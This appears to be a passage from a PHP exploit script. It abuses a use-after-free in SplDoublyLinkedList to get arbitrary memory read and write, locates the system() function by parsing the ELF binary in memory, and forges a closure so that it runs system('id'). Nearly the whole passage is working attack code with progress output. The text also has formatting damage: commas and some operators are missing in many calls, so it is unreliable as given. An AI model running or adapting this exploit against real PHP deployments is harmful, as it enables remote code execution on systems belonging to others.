    # This allows for an easy UAF, because you can call $dll->next() or
    # $dll->prev() in the zval's destructor.

    #

    error_reporting(E_ALL);

    define('NB_DANGLING'200);
    define('SIZE_ELEM_STR'40 24 1);
    define('STR_MARKER'0xcf5ea1);

    function 
    i2s(&$s$p$i$x=8)
    {
       for(
    $j=0;$j<$x;$j++)
       {
           
    $s[$p+$j] = chr($i 0xff);
           
    $i >>= 8;
       }
    }


    function 
    s2i(&$s$p$x=8)
    {
       
    $i 0;

       for(
    $j=$x-1;$j>=0;$j--)
       {
           
    $i <<= 8;
           
    $i |= ord($s[$p+$j]);
       }

       return 
    $i;
    }


    class 
    UAFTrigger
    {
       function 
    __destruct()
       {
           global 
    $dlls$strs$rw_dll$fake_dll_element$leaked_str_offsets;

           
    #"print('UAF __destruct: ' . "\n");
           
    $dlls[NB_DANGLING]->offsetUnset(0);
           
           
    # At this point every $dll->current points to the same freed chunk. We allocate
           # that chunk with a string, and fill the zval part
           
    $fake_dll_element str_shuffle(str_repeat('A'SIZE_ELEM_STR));
           
    i2s($fake_dll_element0x000x12345678); # ptr
           
    i2s($fake_dll_element0x080x000000047); # type + other stuff
           
           # Each of these dlls current->next pointers point to the same location,
           # the string we allocated. When calling next(), our fake element becomes
           # the current value, and as such its rc is incremented. Since rc is at
           # the same place as zend_string.len, the length of the string gets bigger,
           # allowing to R/W any part of the following memory
           
    for($i 0$i <= NB_DANGLING$i++)
               
    $dlls[$i]->next();

           if(
    strlen($fake_dll_element) <= SIZE_ELEM_STR)
               die(
    'Exploit failed: fake_dll_element did not increase in size');
           
           
    $leaked_str_offsets = [];
           
    $leaked_str_zval = [];

           
    # In the memory after our fake element, that we can now read and write,
           # there are lots of zend_string chunks that we allocated. We keep three,
           # and we keep track of their offsets.
           
    for($offset SIZE_ELEM_STR 1$offset <= strlen($fake_dll_element) - 40$offset += 40)
           {
               
    # If we find a string marker, pull it from the string list
               
    if(s2i($fake_dll_element$offset 0x18) == STR_MARKER)
               {
                   
    $leaked_str_offsets[] = $offset;
                   
    $leaked_str_zval[] = $strs[s2i($fake_dll_element$offset 0x20)];
                   if(
    count($leaked_str_zval) == 3)
                       break;
               }
           }

           if(
    count($leaked_str_zval) != 3)
               die(
    'Exploit failed: unable to leak three zend_strings');
           
           
    # free the strings, except the three we need
           
    $strs null;

           
    # Leak adress of first chunk
           
    unset($leaked_str_zval[0]);
           unset(
    $leaked_str_zval[1]);
           unset(
    $leaked_str_zval[2]);
           
    $first_chunk_addr s2i($fake_dll_element$leaked_str_offsets[1]);

           
    # At this point we have 3 freed chunks of size 40, which we can read/write,
           # and we know their address.
           
    print('Address of first RW chunk: 0x' dechex($first_chunk_addr) . "\n");

           
    # In the third one, we will allocate a DLL element which points to a zend_array
           
    $rw_dll->push([3]);
           
    $array_addr s2i($fake_dll_element$leaked_str_offsets[2] + 0x18);
           
    # Change the zval type from zend_object to zend_string
           
    i2s($fake_dll_element$leaked_str_offsets[2] + 0x200x00000006);
           if(
    gettype($rw_dll[0]) != 'string')
               die(
    'Exploit failed: Unable to change zend_array to zend_string');
           
           
    # We can now read anything: if we want to read 0x11223300, we make zend_string*
           # point to 0x11223300-0x10, and read its size using strlen()

           # Read zend_array->pDestructor
           
    $zval_ptr_dtor_addr read($array_addr 0x30);
       
           print(
    'Leaked zval_ptr_dtor address: 0x' dechex($zval_ptr_dtor_addr) . "\n");

           
    # Use it to find zif_system
           
    $system_addr get_system_address($zval_ptr_dtor_addr);
           print(
    'Got PHP_FUNCTION(system): 0x' dechex($system_addr) . "\n");
           
           
    # In the second freed block, we create a closure and copy the zend_closure struct
           # to a string
           
    $rw_dll->push(function ($x) {});
           
    $closure_addr s2i($fake_dll_element$leaked_str_offsets[1] + 0x18);
           
    $data str_shuffle(str_repeat('A'0x200));

           for(
    $i 0$i 0x138$i += 8)
           {
               
    i2s($data$iread($closure_addr $i));
           }
           
           
    # Change internal func type and pointer to make the closure execute system instead
           
    i2s($data0x3814);
           
    i2s($data0x68$system_addr);
           
           
    # Push our string, which contains a fake zend_closure, in the last freed chunk that
           # we control, and make the second zval point to it.
           
    $rw_dll->push($data);
           
    $fake_zend_closure s2i($fake_dll_element$leaked_str_offsets[0] + 0x18) + 24;
           
    i2s($fake_dll_element$leaked_str_offsets[1] + 0x18$fake_zend_closure);
           print(
    'Replaced zend_closure by the fake one: 0x' dechex($fake_zend_closure) . "\n");
           
           
    # Calling it now
           
           
    print('Running system("id");' "\n");
           
    $rw_dll[1]('id');

           
    print_r('DONE'."\n");
       }
    }

    class 
    DanglingTrigger
    {
       function 
    __construct($i)
       {
           
    $this->$i;
       }

       function 
    __destruct()
       {
           global 
    $dlls;
           
    #D print('__destruct: ' . $this->i . "\n");
           
    $dlls[$this->i]->offsetUnset(0);
           
    $dlls[$this->i+1]->push(123);
           
    $dlls[$this->i+1]->offsetUnset(0);
       }
    }

    class 
    SystemExecutor extends ArrayObject
    {
       function 
    offsetGet($x)
       {
           
    parent::offsetGet($x);
       }
    }

    /**
     * Reads an arbitrary address by changing a zval to point to the address minus 0x10,
     * and setting its type to zend_string, so that zend_string->len points to the value
     * we want to read.
     */
    function read($addr$s=8)
    {
       global 
    $fake_dll_element$leaked_str_offsets$rw_dll;

       
    i2s($fake_dll_element$leaked_str_offsets[2] + 0x18$addr 0x10);
       
    i2s($fake_dll_element$leaked_str_offsets[2] + 0x200x00000006);

       
    $value strlen($rw_dll[0]);

       if(
    $s != 8)
           
    $value &= (<< ($s << 3)) - 1;

       return 
    $value;
    }

    function 
    get_binary_base($binary_leak)
    {
       
    $base 0;
       
    $start $binary_leak 0xfffffffffffff000;
       for(
    $i 0$i 0x1000$i++)
       {
           
    $addr $start 0x1000 $i;
           
    $leak read($addr7);
           
    # ELF header
           
    if($leak == 0x10102464c457f)
               return 
    $addr;
       }
       
    # We'll crash before this but it's clearer this way
       
    die('Exploit failed: Unable to find ELF header');
    }

    function 
    parse_elf($base)
    {
       
    $e_type read($base 0x102);

       
    $e_phoff read($base 0x20);
       
    $e_phentsize read($base 0x362);
       
    $e_phnum read($base 0x382);

       for(
    $i 0$i $e_phnum$i++) {
           
    $header $base $e_phoff $i $e_phentsize;
           
    $p_type  read($header 0x004);
           
    $p_flags read($header 0x044);
           
    $p_vaddr read($header 0x10);
           
    $p_memsz read($header 0x28);

           if(
    $p_type == && $p_flags == 6) { # PT_LOAD, PF_Read_Write
               # handle pie
               
    $data_addr $e_type == $p_vaddr $base $p_vaddr;
               
    $data_size $p_memsz;
           } else if(
    $p_type == && $p_flags == 5) { # PT_LOAD, PF_Read_exec
               
    $text_size $p_memsz;
           }
       }

       if(!
    $data_addr || !$text_size || !$data_size)
           die(
    'Exploit failed: Unable to parse ELF');

       return [
    $data_addr$text_size$data_size];
    }

    function 
    get_basic_funcs($base$elf) {
       list(
    $data_addr$text_size$data_size) = $elf;
       for(
    $i 0$i $data_size 8$i++) {
           
    $leak read($data_addr $i 8);
           if(
    $leak $base && $leak $data_addr) {
               
    $deref read($leak);
               
    # 'constant' constant check
               
    if($deref != 0x746e6174736e6f63)
                   continue;
           } else continue;

           
    $leak read($data_addr + ($i 4) * 8);
           if(
    $leak $base && $leak $data_addr) {
               
    $deref read($leak);
               
    # 'bin2hex' constant check
               
    if($deref != 0x786568326e6962)
                   continue;
           } else continue;

           return 
    $data_addr $i 8;
       }
    }

    function 
    get_system($basic_funcs)
    {
       
    $addr $basic_funcs;
       do {
           
    $f_entry read($addr);
           
    $f_name read($f_entry6);

           if(
    $f_name == 0x6d6574737973) { # system
               
    return read($addr 8);
           }
           
    $addr += 0x20;
       } while(
    $f_entry != 0);
       return 
    false;
    }

    function 
    get_system_address($binary_leak)
    {
       
    $base get_binary_base($binary_leak);
       print(
    'ELF base: 0x' .dechex($base) . "\n");
       
    $elf parse_elf($base);
       
    $basic_funcs get_basic_funcs($base$elf);
       print(
    'Basic functions: 0x' .dechex($basic_funcs) . "\n");
       
    $zif_system get_system($basic_funcs);
       return 
    $zif_system;
    }

    $dlls = [];
    $strs = [];
    $rw_dll = new SplDoublyLinkedList();


    # Create a chain of dangling triggers, which will all in turn
    # free current->next, push an element to the next list, and free current
    # This will make sure that every current->next points the same memory block,
    # which we will UAF.
    for($i 0$i NB_DANGLING$i++)
    {
       
    $dlls[$i] = new SplDoublyLinkedList();
       
    $dlls[$i]->push(new DanglingTrigger($i));
       
    $dlls[$i]->rewind();
    }

    # We want our UAF'd list element to be before two strings, so that we can
    # obtain the address of the first string, and increase is size. We then have
    # R/W over all memory after the obtained address.
    define('NB_STRS'50);
    for(
    $i 0$i NB_STRS$i++)
    {
       
    $strs[] = str_shuffle(str_repeat('A'SIZE_ELEM_STR));
       
    i2s($strs[$i], 0STR_MARKER);
       
    i2s($strs[$i], 8$i7);
    }

    # Free one string in the middle, ...
    $strs[NB_STRS 20] = 123;
    # ... and put the to-be-UAF'd list element instead.
    $dlls[0]->push(0);

    # Setup the last DLlist, which will exploit the UAF
    $dlls[NB_DANGLING] = new SplDoublyLinkedList();
    $dlls[NB_DANGLING]->push(new UAFTrigger());
    $dlls[NB_DANGLING]->rewind();

    # Trigger the bug on the first list
    $dlls[0]->offsetUnset(0);